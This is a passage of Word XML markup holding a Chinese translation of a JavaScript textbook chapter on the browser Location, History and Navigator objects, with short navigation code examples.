        <w:t>返回解析后的参数</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339" w:name="14_2_2_Zai_Ru_Xin_De_Wen_Dang_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>14.2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　载入新的文档</w:t>
      </w:r>
      <w:bookmarkEnd w:id="339"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>assign()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以使窗口载入并显示你指定的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中的文档。</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>方法也类似，但它在载入新文档之前会从浏览历史中把当前文档删除。如果脚本无条件地载入一个新文档，</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可能是比</w:t>
      </w:r>
      <w:r>
        <w:t>assgin()</w:t>
      </w:r>
      <w:r>
        <w:t>方法更好的选择。否则，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮会把浏览器带回到原始文档，而相同的脚本则会再次载入新文档。如果检测到用户的浏览器不支持某些特性来显示功能齐全的版本，可以用</w:t>
      </w:r>
      <w:r>
        <w:t>location.replace()</w:t>
      </w:r>
      <w:r>
        <w:t>来载入静态的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>版本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果浏览器不支持</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpReques</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>则将其重定向到一个不需要</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>的静态页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!XMLHttpRequest)location.replace("staticpage.html");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，在这个例子中传入</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>的是一个相对</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。相对</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>是相对于当前页面所在的目录来解析的，就像将它们用于一个超链接中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:t>assgin()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象还定义了</w:t>
      </w:r>
      <w:r>
        <w:t>reload()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，后者可以让浏览器重新载入当前文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使浏览器跳转到新页面的一种更传统的方法是直接把新的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>赋给</w:t>
      </w:r>
      <w:r>
        <w:t>locatio</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>location="http://www.oreilly.com";//</w:t>
      </w:r>
      <w:r>
        <w:t>在此网站购买书！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>还可以把相对</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>赋给</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>，它们会相对当前</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>进行解析：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>location="page2.html";//</w:t>
      </w:r>
      <w:r>
        <w:t>载入下一个页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>纯粹的片段标识符是相对</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的一种类型，它不会让浏览器载入新文档，但只会使它滚动到文档的某个位置。</w:t>
      </w:r>
      <w:r>
        <w:t>#top</w:t>
      </w:r>
      <w:r>
        <w:t>标识符是个特殊的例子：如果文档中没有元素的</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>"top"</w:t>
      </w:r>
      <w:r>
        <w:t>，它会让浏览器跳到文档开始处。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>location="#top";//</w:t>
      </w:r>
      <w:r>
        <w:t>跳转到文档的顶部</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>分解属性是可写的，对它们重新赋值会改变</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的位置，并且导致浏览器载入一个新的文档（如果改变的是</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>属性，则在当前文档中进行跳转）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>location.search="?page="+(pagenum+1);//</w:t>
      </w:r>
      <w:r>
        <w:t>载入下一个页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="340" w:name="14_3_Liu_Lan_Li_Shi_"/>
      <w:r>
        <w:t>14.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　浏览历史</w:t>
      </w:r>
      <w:bookmarkEnd w:id="340"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>history</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用的是该窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t>对象是用来把窗口的浏览历史用文档和文档状态列表的形式表示。</w:t>
      </w:r>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性表示浏览历史列表中的元素数量，但出于安全的因素，</w:t>
      </w:r>
      <w:r>
        <w:t>脚本不能访问已保存的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。（如果允许，则任意脚本都可以窥探你的浏览历史。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>back()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>forward()</w:t>
      </w:r>
      <w:r>
        <w:t>方法与浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>前进</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮一样：它们使浏览器在浏览历史中前后跳转一格。第三个方法</w:t>
      </w:r>
      <w:r>
        <w:t>——go()</w:t>
      </w:r>
      <w:r>
        <w:t>接受一个整数参数，可以在历史列表中向前（正参数）或向后（负参数）跳过任意多个页。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>history.go(-2);//</w:t>
      </w:r>
      <w:r>
        <w:t>后退两个历史记录，相当于单击</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮两次</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果窗口包含多个子窗口</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>比如＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>见</w:t>
      </w:r>
      <w:r>
        <w:t>14.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>，子窗口的浏览历史会按时间顺序穿插在主窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>历史中。这意味着在主窗口调用</w:t>
      </w:r>
      <w:r>
        <w:t>history.back()</w:t>
      </w:r>
      <w:r>
        <w:t>（举例）可能会导致其中一个子窗口往回跳转到前一个显示的文档，但主窗口保留当前状态不变。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>现代</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用可以不通过载入新文档而动态地改变自身内容（见第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>章和第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章）。这么做可能希望用户能用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>前</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>进</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮在这些动态创建的应用状态之间进行跳转。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>将这种技术标准化，请参照</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>之前的历史管理是个更复杂的难题。应用程序必须要在窗口浏览历史中创建一个新的条目来管理自身的历史记录，用历史条目关联自身的状态信息，判断什么时候用户使</w:t>
      </w:r>
      <w:r>
        <w:t>用了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮来移动到不同的历史条目，联合那个条目获取状态信息，并且重新创建应用程序之前的状态。一种方式是用隐藏的＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞来保存状态信息并在浏览器的历史中创建条目。为了创建新的历史条目，需要用</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（见</w:t>
      </w:r>
      <w:r>
        <w:t>15.10.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）动态地把一个新文档写入这个隐藏的窗体。不管怎样，文档内容应该包含重新创建应用状态所需要的状态信息。当用户单击</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，隐藏的窗体的内容会改变。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>之前，没有生成事件来通知你这个改变，因此，为了检测用户是否单击了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮</w:t>
      </w:r>
      <w:r>
        <w:t>，可能要用</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>14.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）每秒对隐藏的窗体检测两到三次，来看它是否改变了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在实际工作中，在那些需要以前的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>历史管理的项目中，开发者通常会使用一些现成的解决方案。很多</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>框架都实现了这种功能。比如，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:t>history</w:t>
      </w:r>
      <w:r>
        <w:t>插件，另外也有些单独的管理历史记录的类库。</w:t>
      </w:r>
      <w:r>
        <w:t>RSH</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>Really Simple History</w:t>
      </w:r>
      <w:r>
        <w:t>）是其中一个</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>比较流行的示例，可以在这里找到，</w:t>
      </w:r>
      <w:r>
        <w:t>http://code.google.com/p/reallysimplehistory/</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节解释如何用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>进行历史管理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="341" w:name="14_4_Liu_Lan_Qi_He_Ping_Mu_Xin_Xi_"/>
      <w:r>
        <w:t>14.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　浏览器和屏幕信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="341"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>脚本有时候需要获取和它们所在的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器或浏览器所在的桌面相关的信息。本节介绍</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>navigator</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:t>属性。它们分别引用的是</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Screen</w:t>
      </w:r>
      <w:r>
        <w:t>对象，而这些对象提供的信息允许脚本来根据环境定制自己的行为。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="342" w:name="14_4_1_NavigatorDui_Xiang_"/>
      <w:r>
        <w:t>14.4.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="342"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>navigator</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用的是包含浏览器厂商和版本信息的</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象的命名是为了纪念</w:t>
      </w:r>
      <w:r>
        <w:t>Netscape</w:t>
      </w:r>
      <w:r>
        <w:t>之后</w:t>
      </w:r>
      <w:r>
        <w:t>Nav</w:t>
      </w:r>
      <w:r>
        <w:t>igator</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>，不过所有其他的浏览器也支持它（</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>还支持</w:t>
      </w:r>
      <w:r>
        <w:t>clientInformation</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它作为</w:t>
      </w:r>
      <w:r>
        <w:t>navigator</w:t>
      </w:r>
      <w:r>
        <w:t>的厂商中立同义词。遗憾的是，其他浏览器并不支持这一更直观的属性命名）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>过去，</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象通常被脚本用来确定它们是在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中还是在</w:t>
      </w:r>
      <w:r>
        <w:t>Netscape</w:t>
      </w:r>
      <w:r>
        <w:t>中运行。这种浏览器嗅探方法有问题，因为它要求随着新浏览器和现有浏览器的新版本的引入而不断地调整。如今，有一</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>种更好的功能测试方法（参见</w:t>
      </w:r>
      <w:r>
        <w:t>13.4.3</w:t>
      </w:r>
      <w:r>
        <w:t>节），只需要测试所需要的功能（即，方法或属性），而不是假设特定的浏览器版本及其功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>然而，浏览器嗅探有时候仍然有价值。这样的一种情况是，当需要解决存在于某个特定的浏览器的特定版本中的特殊的</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>时。</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象有</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个属性用于提供关于运行中的浏览器的版本信息，并且可以使用这些属性进行浏览器嗅探。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>appName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的全称。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中，这就是</w:t>
      </w:r>
      <w:r>
        <w:t>"Microsoft Internet Explorer"</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>中，该属性就是</w:t>
      </w:r>
      <w:r>
        <w:t>"Netscape"</w:t>
      </w:r>
      <w:r>
        <w:t>。为了兼容现存的浏览器嗅探代码，其他浏览器通常也取值为</w:t>
      </w:r>
      <w:r>
        <w:t>"Netscape"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>appVersion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>此属性通常以数字开始，并跟着包含浏览器厂商和版本信息的详细字符串。字符串前面的数字通常是</w:t>
      </w:r>
      <w:r>
        <w:t>4.0</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>5.0</w:t>
      </w:r>
      <w:r>
        <w:t>，表示它是第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>或第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>代兼容的浏览器。</w:t>
      </w:r>
      <w:r>
        <w:t>appVersion</w:t>
      </w:r>
      <w:r>
